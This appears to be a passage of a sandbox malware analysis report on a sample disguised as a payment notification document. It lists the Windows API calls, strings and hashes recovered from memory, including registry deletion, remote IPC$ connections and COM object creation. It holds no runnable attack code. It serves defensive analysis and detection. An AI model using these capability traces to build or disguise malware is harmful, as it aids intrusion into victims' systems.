                                                                              • GetWindowRect.USER32(?,?), ref: 00944B8B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                              • String ID: ThumbnailClass
                                                                              • API String ID: 1311036022-1241985126
                                                                              • Opcode ID: dc70a5453924ae65d7e22ca1691f09ae56464f0e0b5cb7be94ee248143a7fda3
                                                                              • Instruction ID: c64f8a5aeb20ee0950c40880989e5e6efd00fe04620a617f1dc2679ef3bf7274
                                                                              • Opcode Fuzzy Hash: dc70a5453924ae65d7e22ca1691f09ae56464f0e0b5cb7be94ee248143a7fda3
                                                                              • Instruction Fuzzy Hash: CB91C0721082069FDB04DF14C985FAA77ECFF84718F048469FD899A196EB34ED45CBA1
                                                                              APIs
                                                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0096CC64
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0096CC8D
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0096CD48
                                                                                • Part of subcall function 0096CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0096CCAA
                                                                                • Part of subcall function 0096CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0096CCBD
                                                                                • Part of subcall function 0096CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0096CCCF
                                                                                • Part of subcall function 0096CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0096CD05
                                                                                • Part of subcall function 0096CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0096CD28
                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 0096CCF3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                              • API String ID: 2734957052-4033151799
                                                                              • Opcode ID: 4c64c040c2f6c7be447a2d41e40566cc756e73ae7573645d9a75d38689e86e2e
                                                                              • Instruction ID: b6c26cd151d34971a451b29fcd88e802ee4a6a9d4e54d9f148802766501ba91c
                                                                              • Opcode Fuzzy Hash: 4c64c040c2f6c7be447a2d41e40566cc756e73ae7573645d9a75d38689e86e2e
                                                                              • Instruction Fuzzy Hash: 153160F2905129BBDB209B54DC88EFFBB7CEF46750F000569B949E2240D7349A85EAE0
                                                                              APIs
                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00953D40
                                                                              • _wcslen.LIBCMT ref: 00953D6D
                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 00953D9D
                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00953DBE
                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 00953DCE
                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00953E55
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00953E60
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00953E6B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                              • String ID: :$\$\??\%s
                                                                              • API String ID: 1149970189-3457252023
                                                                              • Opcode ID: 098b22f55e17ede506b6a0d7e29ad7074642492b5e6fb84e21ed746c080c5513
                                                                              • Instruction ID: 5aed6c5efbbecf344659a74dec9bd93c00bce16c80197a191810a7901309da71
                                                                              • Opcode Fuzzy Hash: 098b22f55e17ede506b6a0d7e29ad7074642492b5e6fb84e21ed746c080c5513
                                                                              • Instruction Fuzzy Hash: 2A31B6B2514109ABDB21DBA1DC49FEF37BCEF88741F1040B9FA19D6091E77497888B24
                                                                              APIs
                                                                              • timeGetTime.WINMM ref: 0094E6B4
                                                                                • Part of subcall function 008FE551: timeGetTime.WINMM(?,?,0094E6D4), ref: 008FE555
                                                                              • Sleep.KERNEL32(0000000A), ref: 0094E6E1
                                                                              • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0094E705
                                                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0094E727
                                                                              • SetActiveWindow.USER32 ref: 0094E746
                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0094E754
                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 0094E773
                                                                              • Sleep.KERNEL32(000000FA), ref: 0094E77E
                                                                              • IsWindow.USER32 ref: 0094E78A
                                                                              • EndDialog.USER32(00000000), ref: 0094E79B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                              • String ID: BUTTON
                                                                              • API String ID: 1194449130-3405671355
                                                                              • Opcode ID: 7e9b9c98d4cbb91d5a4859cddb77fde67ab91574368e33127df6bcf35dfb3c3f
                                                                              • Instruction ID: c0b8ffdd1d808f272a08698bfda3a06d792c96c8ff6b2b8cbba9175bf6f578d0
                                                                              • Opcode Fuzzy Hash: 7e9b9c98d4cbb91d5a4859cddb77fde67ab91574368e33127df6bcf35dfb3c3f
                                                                              • Instruction Fuzzy Hash: 322181B1628205EFEB005F30EDCAE293B6DF7543A9F101629F50AC11A1DB71AC40AB24
                                                                              APIs
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0094EA5D
                                                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0094EA73
                                                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0094EA84
                                                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0094EA96
                                                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0094EAA7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: SendString$_wcslen
                                                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                              • API String ID: 2420728520-1007645807
                                                                              • Opcode ID: 043f79818e9c98d63e5a88e97fd83c560569bf7e769d729527761e234737edc9
                                                                              • Instruction ID: e76476e3c7695be19f75f0553d4933ac11448698a52cc9ae1564c16b8ddc9e41
                                                                              • Opcode Fuzzy Hash: 043f79818e9c98d63e5a88e97fd83c560569bf7e769d729527761e234737edc9
                                                                              • Instruction Fuzzy Hash: B0117C31A9026979D720E7AADC4AEFF6A7CFBD3B04F440529B811E20D1EEB04E45C5B1
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000001), ref: 00945CE2
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00945CFB
                                                                              • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00945D59
                                                                              • GetDlgItem.USER32(?,00000002), ref: 00945D69
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00945D7B
                                                                              • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00945DCF
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00945DDD
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00945DEF
                                                                              • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00945E31
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00945E44
                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00945E5A
                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00945E67
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                              • String ID:
                                                                              • API String ID: 3096461208-0
                                                                              • Opcode ID: 75bfd57fa839b2f69140c08764ec5d5486116252dd3ded27de944d5fc3348555
                                                                              • Instruction ID: 084a5013aeef9a215409fb25306542df28fb02561ff8d0ba038f72718744f5a4
                                                                              • Opcode Fuzzy Hash: 75bfd57fa839b2f69140c08764ec5d5486116252dd3ded27de944d5fc3348555
                                                                              • Instruction Fuzzy Hash: 47511CB1B10605AFDF18CFA8CD89EAEBBB9EF48300F158129F519E6291D7709E40CB50
                                                                              APIs
                                                                                • Part of subcall function 008F8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008F8BE8,?,00000000,?,?,?,?,008F8BBA,00000000,?), ref: 008F8FC5
                                                                              • DestroyWindow.USER32(?), ref: 008F8C81
                                                                              • KillTimer.USER32(00000000,?,?,?,?,008F8BBA,00000000,?), ref: 008F8D1B
                                                                              • DestroyAcceleratorTable.USER32(00000000), ref: 00936973
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,008F8BBA,00000000,?), ref: 009369A1
                                                                              • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,008F8BBA,00000000,?), ref: 009369B8
                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,008F8BBA,00000000), ref: 009369D4
                                                                              • DeleteObject.GDI32(00000000), ref: 009369E6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                              • String ID:
                                                                              • API String ID: 641708696-0
                                                                              • Opcode ID: e27906e6c93971089fba99e398e331b3b30203b4dcd244874499ecd760abb73a
                                                                              • Instruction ID: 5d03fcb7329f4eb67286c8164605462304129fbb53de85977e7c491df9ea1612
                                                                              • Opcode Fuzzy Hash: e27906e6c93971089fba99e398e331b3b30203b4dcd244874499ecd760abb73a
                                                                              • Instruction Fuzzy Hash: 0B619931116608EFDB259F28DA58B3977F1FB40326F54861CE286DB960CB31A990EF90
                                                                              APIs
                                                                                • Part of subcall function 008F9944: GetWindowLongW.USER32(?,000000EB), ref: 008F9952
                                                                              • GetSysColor.USER32(0000000F), ref: 008F9862
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ColorLongWindow
                                                                              • String ID:
                                                                              • API String ID: 259745315-0
                                                                              • Opcode ID: 6e2dee6afde7818651c8bb1594d138afdc202bdd58c66af49f5c85f2a2c964b9
                                                                              • Instruction ID: 5a739a74acb6ce7ac054bcbb7a0b1e57ca495185fd0d1f3186441805e81d3fe5
                                                                              • Opcode Fuzzy Hash: 6e2dee6afde7818651c8bb1594d138afdc202bdd58c66af49f5c85f2a2c964b9
                                                                              • Instruction Fuzzy Hash: A041AF71118648AFDB305F389C88BB93BA9FB46370F144629FAE6C71E1C7319981EB11
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0092F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00949717
                                                                              • LoadStringW.USER32(00000000,?,0092F7F8,00000001), ref: 00949720
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0092F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00949742
                                                                              • LoadStringW.USER32(00000000,?,0092F7F8,00000001), ref: 00949745
                                                                              • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00949866
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: HandleLoadModuleString$Message_wcslen
                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                              • API String ID: 747408836-2268648507
                                                                              • Opcode ID: 4fcdb397da235d22f3e50335ef6ed52816631f86fddef16c8a24599d71bfcacc
                                                                              • Instruction ID: 2f5f8a983d3946653d54a12117176e0c91f35d94d238ee65680bc975db973458
                                                                              • Opcode Fuzzy Hash: 4fcdb397da235d22f3e50335ef6ed52816631f86fddef16c8a24599d71bfcacc
                                                                              • Instruction Fuzzy Hash: 3B417D72804259AACB04FBE5DD86EEF7778FF56340F600025F605B2192EA646F48CB62
                                                                              APIs
                                                                                • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009407A2
                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009407BE
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009407DA
                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00940804
                                                                              • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0094082C
                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00940837
                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0094083C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                              • API String ID: 323675364-22481851
                                                                              • Opcode ID: cd8c0fa7db2205dbc29c67d6e5b6753e751840939d5cf209a25346ced8b1d033
                                                                              • Instruction ID: 000a703c839b1a4a1b875f7d3829f3bf3f3eaed958cac41fe35b850e6875b7d7
                                                                              • Opcode Fuzzy Hash: cd8c0fa7db2205dbc29c67d6e5b6753e751840939d5cf209a25346ced8b1d033
                                                                              • Instruction Fuzzy Hash: 12414B72C10228ABCF15EFA4DC85CEEB778FF85750F554129E915A3161EB30AE44CBA1
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 00963C5C
                                                                              • CoInitialize.OLE32(00000000), ref: 00963C8A
                                                                              • CoUninitialize.OLE32 ref: 00963C94
                                                                              • _wcslen.LIBCMT ref: 00963D2D
                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00963DB1
                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00963ED5
                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00963F0E
                                                                              • CoGetObject.OLE32(?,00000000,0097FB98,?), ref: 00963F2D
                                                                              • SetErrorMode.KERNEL32(00000000), ref: 00963F40
                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00963FC4
                                                                              • VariantClear.OLEAUT32(?), ref: 00963FD8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                              • String ID:
                                                                              • API String ID: 429561992-0
                                                                              • Opcode ID: 18a8a4b7a482d2ec60922089ebda865a796e540831b606cdafd978ba0836438a
                                                                              • Instruction ID: eeecf090df5bd493aca17869421e9f1c0981b5a9cb500d2a485eee48661e4e56
                                                                              • Opcode Fuzzy Hash: 18a8a4b7a482d2ec60922089ebda865a796e540831b606cdafd978ba0836438a
                                                                              • Instruction Fuzzy Hash: B2C125B1608305AFD700DF68C88492BBBE9FF89744F14891DF98A9B251D731EE45CB52
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 00957AF3
                                                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00957B8F
                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 00957BA3
                                                                              • CoCreateInstance.OLE32(0097FD08,00000000,00000001,009A6E6C,?), ref: 00957BEF
                                                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00957C74
                                                                              • CoTaskMemFree.OLE32(?,?), ref: 00957CCC
                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00957D57
                                                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00957D7A
                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00957D81
                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00957DD6
                                                                              • CoUninitialize.OLE32 ref: 00957DDC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                              • String ID:
                                                                              • API String ID: 2762341140-0
                                                                              • Opcode ID: 4f10f65d61a873c8832aae85ef4454748cc367881e78478167ade918f16e5c67
                                                                              • Instruction ID: cdf42c23b0d598ea32007278ce1e18d03305193d9eabe44192bee8f1a3086595
                                                                              • Opcode Fuzzy Hash: 4f10f65d61a873c8832aae85ef4454748cc367881e78478167ade918f16e5c67
                                                                              • Instruction Fuzzy Hash: C5C12B75A04209AFCB14DFA5D884DAEBBF9FF48305B148499E81ADB361D730EE45CB90
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00975504
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00975515
                                                                              • CharNextW.USER32(00000158), ref: 00975544
                                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00975585
                                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0097559B
                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009755AC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CharNext
                                                                              • String ID:
                                                                              • API String ID: 1350042424-0
                                                                              • Opcode ID: bd5101f14bdd6c13cb6c5fc6791e76bf527444c2e9272d8cfddc24fc9f9fb612
                                                                              • Instruction ID: db4edbe1d2fdb4753202b19e0dfb16fc417fa7965ea901f555159bdf6ea00e01
                                                                              • Opcode Fuzzy Hash: bd5101f14bdd6c13cb6c5fc6791e76bf527444c2e9272d8cfddc24fc9f9fb612
                                                                              • Instruction Fuzzy Hash: 7F61C072904609EFDF508F50CC84AFE7BB9FF05720F518549F629A62A0D7B49A80DB60
                                                                              APIs
                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0093FAAF
                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 0093FB08
                                                                              • VariantInit.OLEAUT32(?), ref: 0093FB1A
                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 0093FB3A
                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0093FB8D
